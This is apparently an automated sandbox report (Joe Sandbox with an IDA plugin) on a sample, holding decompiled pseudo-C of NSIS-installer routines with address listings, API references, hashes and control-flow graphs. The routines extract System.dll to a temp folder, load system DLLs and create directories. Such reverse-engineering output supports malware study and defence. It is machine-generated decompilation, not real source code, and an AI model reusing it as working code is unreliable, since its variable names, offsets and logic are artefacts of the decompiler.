                                                  						E0040657A(_t77, _t81, _t83, "C:\Users\alfons\AppData\Local\Temp\nsm4CBF.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                  						E0040653D(_t83, "C:\Users\alfons\AppData\Local\Temp\nsm4CBF.tmp");
                                                  						_t64 = E00405B9D("C:\Users\alfons\AppData\Local\Temp\nsm4CBF.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                  						__eflags = _t64;
                                                  						if(_t64 == 0) {
                                                  							continue;
                                                  						} else {
                                                  							__eflags = _t64 == 1;
                                                  							if(_t64 == 1) {
                                                  								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                  								L32:
                                                  								_t51 = 0;
                                                  								__eflags = 0;
                                                  							} else {
                                                  								_push(_t81);
                                                  								_push(0xfffffffa);
                                                  								E0040559F();
                                                  								L29:
                                                  								_t51 = 0x7fffffff;
                                                  							}
                                                  						}
                                                  					}
                                                  					L33:
                                                  					return _t51;
                                                  				}
                                                  				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                  				 *0x434fb4 =  *0x434fb4 + 1;
                                                  				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                  				 *0x434fb4 =  *0x434fb4 - 1;
                                                  				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                  				_t84 = _t45;
                                                  				if( *(_t86 - 0x24) != 0xffffffff) {
                                                  					L22:
                                                  					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                  				} else {
                                                  					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                  					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                  						goto L22;
                                                  					}
                                                  				}
                                                  				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                  				__eflags = _t84 - _t77;
                                                  				if(_t84 >= _t77) {
                                                  					goto L31;
                                                  				} else {
                                                  					__eflags = _t84 - 0xfffffffe;
                                                  					if(_t84 != 0xfffffffe) {
                                                  						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                  					} else {
                                                  						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                  						lstrcatW(_t81,  *(_t86 - 8));
                                                  					}
                                                  					_push(0x200010);
                                                  					_push(_t81);
                                                  					E00405B9D();
                                                  					goto L29;
                                                  				}
                                                  				goto L33;
                                                  			}


















                                                  0x0040176f
                                                  0x00401776
                                                  0x00401782
                                                  0x00401785
                                                  0x0040178a
                                                  0x0040178d
                                                  0x00401794
                                                  0x004017b0
                                                  0x00401796
                                                  0x00401797
                                                  0x00401797
                                                  0x004017b6
                                                  0x004017bb
                                                  0x004017bb
                                                  0x004017bf
                                                  0x004017c2
                                                  0x004017c7
                                                  0x004017c9
                                                  0x004017cb
                                                  0x004017d0
                                                  0x004017d0
                                                  0x004017db
                                                  0x004017db
                                                  0x004017ec
                                                  0x004017ee
                                                  0x004017ee
                                                  0x004017ef
                                                  0x004017ef
                                                  0x004017f2
                                                  0x004017f5
                                                  0x004017f8
                                                  0x004017f8
                                                  0x004017ff
                                                  0x0040180e
                                                  0x00401813
                                                  0x00401816
                                                  0x00401819
                                                  0x00000000
                                                  0x00000000
                                                  0x0040181b
                                                  0x0040181e
                                                  0x00401874
                                                  0x00401879
                                                  0x004015b6
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00402c2a
                                                  0x00402c2d
                                                  0x00402c2d
                                                  0x00000000
                                                  0x00401820
                                                  0x00401826
                                                  0x0040182d
                                                  0x0040183a
                                                  0x00401845
                                                  0x0040185b
                                                  0x0040185b
                                                  0x0040185e
                                                  0x00000000
                                                  0x00401864
                                                  0x00401864
                                                  0x00401865
                                                  0x00401882
                                                  0x00402c33
                                                  0x00402c33
                                                  0x00402c33
                                                  0x00401867
                                                  0x00401867
                                                  0x00401868
                                                  0x00401493
                                                  0x0040239d
                                                  0x0040239d
                                                  0x0040239d
                                                  0x00401865
                                                  0x0040185e
                                                  0x00402c35
                                                  0x00402c39
                                                  0x00402c39
                                                  0x00401892
                                                  0x00401897
                                                  0x004018a5
                                                  0x004018aa
                                                  0x004018b0
                                                  0x004018b4
                                                  0x004018b6
                                                  0x004018be
                                                  0x004018ca
                                                  0x004018b8
                                                  0x004018b8
                                                  0x004018bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004018bc
                                                  0x004018d3
                                                  0x004018d9
                                                  0x004018db
                                                  0x00000000
                                                  0x004018e1
                                                  0x004018e1
                                                  0x004018e4
                                                  0x004018fc
                                                  0x004018e6
                                                  0x004018e9
                                                  0x004018f2
                                                  0x004018f2
                                                  0x00401901
                                                  0x00401906
                                                  0x00402398
                                                  0x00000000
                                                  0x00402398
                                                  0x00000000

                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000,00425A20,7519EA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000,00425A20,7519EA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00403418), ref: 004055FA
                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll), ref: 0040560C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp$C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll$Call
                                                  • API String ID: 1941528284-922674430
                                                  • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                  • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                  • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                  • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 645 4055f6-4055fa lstrcatW 641->645 643 405612-405616 642->643 644 405605-40560c SetWindowTextW 642->644 646 405618-40565a SendMessageW * 3 643->646 647 40565c-40565e 643->647 644->643 645->642 646->647 647->637 648 405660-405663 647->648 648->637
                                                  C-Code - Quality: 100%
                                                  			E0040559F(signed int _a4, WCHAR* _a8) {
                                                  				struct HWND__* _v8;
                                                  				signed int _v12;
                                                  				WCHAR* _v32;
                                                  				long _v44;
                                                  				int _v48;
                                                  				void* _v52;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				WCHAR* _t27;
                                                  				signed int _t28;
                                                  				long _t29;
                                                  				signed int _t37;
                                                  				signed int _t38;
                                                  
                                                  				_t27 =  *0x433ee4;
                                                  				_v8 = _t27;
                                                  				if(_t27 != 0) {
                                                  					_t37 =  *0x434fb4;
                                                  					_v12 = _t37;
                                                  					_t38 = _t37 & 0x00000001;
                                                  					if(_t38 == 0) {
                                                  						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                  					}
                                                  					_t27 = lstrlenW(0x42c248);
                                                  					_a4 = _t27;
                                                  					if(_a8 == 0) {
                                                  						L6:
                                                  						if((_v12 & 0x00000004) == 0) {
                                                  							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                  						}
                                                  						if((_v12 & 0x00000002) == 0) {
                                                  							_v32 = 0x42c248;
                                                  							_v52 = 1;
                                                  							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                  							_v44 = 0;
                                                  							_v48 = _t29 - _t38;
                                                  							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                  							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                  						}
                                                  						if(_t38 != 0) {
                                                  							_t28 = _a4;
                                                  							0x42c248[_t28] = 0;
                                                  							return _t28;
                                                  						}
                                                  					} else {
                                                  						_t27 = lstrlenW(_a8) + _a4;
                                                  						if(_t27 < 0x1000) {
                                                  							_t27 = lstrcatW(0x42c248, _a8);
                                                  							goto L6;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t27;
                                                  			}

















                                                  0x004055a5
                                                  0x004055af
                                                  0x004055b4
                                                  0x004055ba
                                                  0x004055c5
                                                  0x004055c8
                                                  0x004055cb
                                                  0x004055d1
                                                  0x004055d1
                                                  0x004055d7
                                                  0x004055df
                                                  0x004055e2
                                                  0x004055ff
                                                  0x00405603
                                                  0x0040560c
                                                  0x0040560c
                                                  0x00405616
                                                  0x0040561f
                                                  0x0040562b
                                                  0x00405632
                                                  0x00405636
                                                  0x00405639
                                                  0x0040564c
                                                  0x0040565a
                                                  0x0040565a
                                                  0x0040565e
                                                  0x00405660
                                                  0x00405663
                                                  0x00000000
                                                  0x00405663
                                                  0x004055e4
                                                  0x004055ec
                                                  0x004055f4
                                                  0x004055fa
                                                  0x00000000
                                                  0x004055fa
                                                  0x004055f4
                                                  0x004055e2
                                                  0x0040566f

                                                  APIs
                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000,00425A20,7519EA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000,00425A20,7519EA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00403418), ref: 004055FA
                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll), ref: 0040560C
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000), ref: 00406779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll
                                                  • API String ID: 1495540970-2997400033
                                                  • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                  • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                  • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                  • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 649 40689a-4068ba GetSystemDirectoryW 650 4068bc 649->650 651 4068be-4068c0 649->651 650->651 652 4068d1-4068d3 651->652 653 4068c2-4068cb 651->653 655 4068d4-406907 wsprintfW LoadLibraryExW 652->655 653->652 654 4068cd-4068cf 653->654 654->655
                                                  C-Code - Quality: 100%
                                                  			E0040689A(intOrPtr _a4) {
                                                  				short _v576;
                                                  				signed int _t13;
                                                  				struct HINSTANCE__* _t17;
                                                  				signed int _t19;
                                                  				void* _t24;
                                                  
                                                  				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                  				if(_t13 > 0x104) {
                                                  					_t13 = 0;
                                                  				}
                                                  				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                  					_t19 = 1;
                                                  				} else {
                                                  					_t19 = 0;
                                                  				}
                                                  				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                  				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                  				return _t17;
                                                  			}








                                                  0x004068b1
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bc
                                                  0x004068c0
                                                  0x004068d3
                                                  0x004068cd
                                                  0x004068cd
                                                  0x004068cd
                                                  0x004068ec
                                                  0x00406900
                                                  0x00406907

                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                  • wsprintfW.USER32 ref: 004068EC
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME$\
                                                  • API String ID: 2200240437-1946221925
                                                  • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                  • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                  • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                  • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 656 405a6e-405ab9 CreateDirectoryW 657 405abb-405abd 656->657 658 405abf-405acc GetLastError 656->658 659 405ae6-405ae8 657->659 658->659 660 405ace-405ae2 SetFileSecurityW 658->660 660->657 661 405ae4 GetLastError 660->661 661->659
                                                  C-Code - Quality: 100%
                                                  			E00405A6E(WCHAR* _a4) {
                                                  				struct _SECURITY_ATTRIBUTES _v16;
                                                  				struct _SECURITY_DESCRIPTOR _v36;
                                                  				int _t22;
                                                  				long _t23;
                                                  
                                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                  				_v36.Owner = 0x4083f8;
                                                  				_v36.Group = 0x4083f8;
                                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                  				_v16.lpSecurityDescriptor =  &_v36;
                                                  				_v36.Revision = 1;
                                                  				_v36.Control = 4;
                                                  				_v36.Dacl = 0x4083e8;
                                                  				_v16.nLength = 0xc;
                                                  				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                  				if(_t22 != 0) {
                                                  					L1:
                                                  					return 0;
                                                  				}
                                                  				_t23 = GetLastError();
                                                  				if(_t23 == 0xb7) {
                                                  					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                  						goto L1;
                                                  					}
                                                  					return GetLastError();
                                                  				}
                                                  				return _t23;
                                                  			}







                                                  0x00405a79
                                                  0x00405a7d
                                                  0x00405a80
                                                  0x00405a86
                                                  0x00405a8a
                                                  0x00405a8e
                                                  0x00405a96
                                                  0x00405a9d
                                                  0x00405aa3
                                                  0x00405aaa
                                                  0x00405ab1
                                                  0x00405ab9
                                                  0x00405abb
                                                  0x00000000
                                                  0x00405abb
                                                  0x00405ac5
                                                  0x00405acc
                                                  0x00405ae2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405ae4
                                                  0x00405ae8

                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                  • GetLastError.KERNEL32 ref: 00405AC5
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                  • GetLastError.KERNEL32 ref: 00405AE4
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 3449924974-823278215
                                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                  • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                  • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 662 73201817-73201856 call 73201bff 666 73201976-73201978 662->666 667 7320185c-73201860 662->667 668 73201862-73201868 call 7320243e 667->668 669 73201869-73201876 call 73202480 667->669 668->669 674 732018a6-732018ad 669->674 675 73201878-7320187d 669->675 678 732018cd-732018d1 674->678 679 732018af-732018cb call 73202655 call 73201654 call 73201312 GlobalFree 674->679 676 73201898-7320189b 675->676 677 7320187f-73201880 675->677 676->674 685 7320189d-7320189e call 73202e23 676->685 681 73201882-73201883 677->681 682 73201888-73201889 call 73202b98 677->682 683 732018d3-7320191c call 73201666 call 73202655 678->683 684 7320191e-73201924 call 73202655 678->684 703 73201925-73201929 679->703 687 73201890-73201896 call 73202810 681->687 688 73201885-73201886 681->688 694 7320188e 682->694 683->703 684->703 697 732018a3 685->697 702 732018a5 687->702 688->674 688->682 694->697 697->702 702->674 704 73201966-7320196d 703->704 705 7320192b-73201939 call 73202618 703->705 704->666 710 7320196f-73201970 GlobalFree 704->710 712 73201951-73201958 705->712 713 7320193b-7320193e 705->713 710->666 712->704 715 7320195a-73201965 call 732015dd 712->715 713->712 714 73201940-73201948 713->714 714->712 716 7320194a-7320194b FreeLibrary 714->716 715->704 716->712
                                                  C-Code - Quality: 88%
                                                  			E73201817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                  				void _v36;
                                                  				char _v136;
                                                  				struct HINSTANCE__* _t37;
                                                  				void* _t39;
                                                  				intOrPtr _t42;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t50;
                                                  				void* _t54;
                                                  				intOrPtr _t57;
                                                  				signed int _t61;
                                                  				signed int _t63;
                                                  				void* _t67;
                                                  				void* _t68;
                                                  				void* _t72;
                                                  				void* _t76;
                                                  
                                                  				_t76 = __esi;
                                                  				_t68 = __edi;
                                                  				_t67 = __edx;
                                                  				 *0x7320506c = _a8;
                                                  				 *0x73205070 = _a16;
                                                  				 *0x73205074 = _a12;
                                                  				 *((intOrPtr*)(_a20 + 0xc))( *0x73205048, E73201651);
                                                  				_push(1); // executed
                                                  				_t37 = E73201BFF(); // executed
                                                  				_t54 = _t37;
                                                  				if(_t54 == 0) {
                                                  					L28:
                                                  					return _t37;
                                                  				} else {
                                                  					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                  						E7320243E(_t54);
                                                  					}
                                                  					_push(_t54);
                                                  					E73202480(_t67);
                                                  					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                  					if(_t57 == 0xffffffff) {
                                                  						L14:
                                                  						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                  							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                  								_push(_t54);
                                                  								_t37 = E73202655();
                                                  							} else {
                                                  								_push(_t76);
                                                  								_push(_t68);
                                                  								_t61 = 8;
                                                  								_t13 = _t54 + 0x1018; // 0x1018
                                                  								memcpy( &_v36, _t13, _t61 << 2);
                                                  								_t42 = E73201666(_t54,  &_v136);
                                                  								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                  								_t18 = _t54 + 0x1018; // 0x1018
                                                  								_t72 = _t18;
                                                  								_push(_t54);
                                                  								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                  								 *_t72 = 4;
                                                  								E73202655();
                                                  								_t63 = 8;
                                                  								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                  							}
                                                  						} else {
                                                  							_push(_t54);
                                                  							E73202655();
                                                  							_t37 = GlobalFree(E73201312(E73201654(_t54)));
                                                  						}
                                                  						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                  							_t37 = E73202618(_t54);
                                                  							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                  								_t37 =  *(_t54 + 0x1008);
                                                  								if(_t37 != 0) {
                                                  									_t37 = FreeLibrary(_t37);
                                                  								}
                                                  							}
                                                  							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                  								_t37 = E732015DD( *0x73205068);
                                                  							}
                                                  						}
                                                  						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                  							goto L28;
                                                  						} else {
                                                  							_t39 = GlobalFree(_t54); // executed
                                                  							return _t39;
                                                  						}
                                                  					}
                                                  					_t48 =  *_t54;
                                                  					if(_t48 == 0) {
                                                  						if(_t57 != 1) {
                                                  							goto L14;
                                                  						}
                                                  						E73202E23(_t54);
                                                  						L12:
                                                  						_t54 = _t48;
                                                  						L13:
                                                  						goto L14;
                                                  					}
                                                  					_t49 = _t48 - 1;
                                                  					if(_t49 == 0) {
                                                  						L8:
                                                  						_t48 = E73202B98(_t57, _t54); // executed
                                                  						goto L12;
                                                  					}
                                                  					_t50 = _t49 - 1;
                                                  					if(_t50 == 0) {
                                                  						E73202810(_t54);
                                                  						goto L13;
                                                  					}
                                                  					if(_t50 != 1) {
                                                  						goto L14;
                                                  					}
                                                  					goto L8;
                                                  				}
                                                  			}



















                                                  0x73201817
                                                  0x73201817
                                                  0x73201817
                                                  0x73201824
                                                  0x7320182c
                                                  0x73201839
                                                  0x73201847
                                                  0x7320184a
                                                  0x7320184c
                                                  0x73201851
                                                  0x73201856
                                                  0x73201978
                                                  0x73201978
                                                  0x7320185c
                                                  0x73201860
                                                  0x73201863
                                                  0x73201868
                                                  0x73201869
                                                  0x7320186a
                                                  0x73201870
                                                  0x73201876
                                                  0x732018a6
                                                  0x732018ad
                                                  0x732018d1
                                                  0x7320191e
                                                  0x7320191f
                                                  0x732018d3
                                                  0x732018d3
                                                  0x732018d4
                                                  0x732018dd
                                                  0x732018de
                                                  0x732018e8
                                                  0x732018eb
                                                  0x732018f0
                                                  0x732018f7
                                                  0x732018f7
                                                  0x732018fd
                                                  0x732018fe
                                                  0x73201904
                                                  0x7320190a
                                                  0x73201917
                                                  0x73201918
                                                  0x7320191b
                                                  0x732018af
                                                  0x732018af
                                                  0x732018b0
                                                  0x732018c5
                                                  0x732018c5
                                                  0x73201929
                                                  0x7320192c
                                                  0x73201939
                                                  0x73201940
                                                  0x73201948
                                                  0x7320194b
                                                  0x7320194b
                                                  0x73201948
                                                  0x73201958
                                                  0x73201960
                                                  0x73201965
                                                  0x73201958
                                                  0x7320196d
                                                  0x00000000
                                                  0x7320196f
                                                  0x73201970
                                                  0x00000000
                                                  0x73201970
                                                  0x7320196d
                                                  0x7320187a
                                                  0x7320187d
                                                  0x7320189b
                                                  0x00000000
                                                  0x00000000
                                                  0x7320189e
                                                  0x732018a3
                                                  0x732018a3
                                                  0x732018a5
                                                  0x00000000
                                                  0x732018a5
                                                  0x7320187f
                                                  0x73201880
                                                  0x73201888
                                                  0x73201889
                                                  0x00000000
                                                  0x73201889
                                                  0x73201882
                                                  0x73201883
                                                  0x73201891
                                                  0x00000000
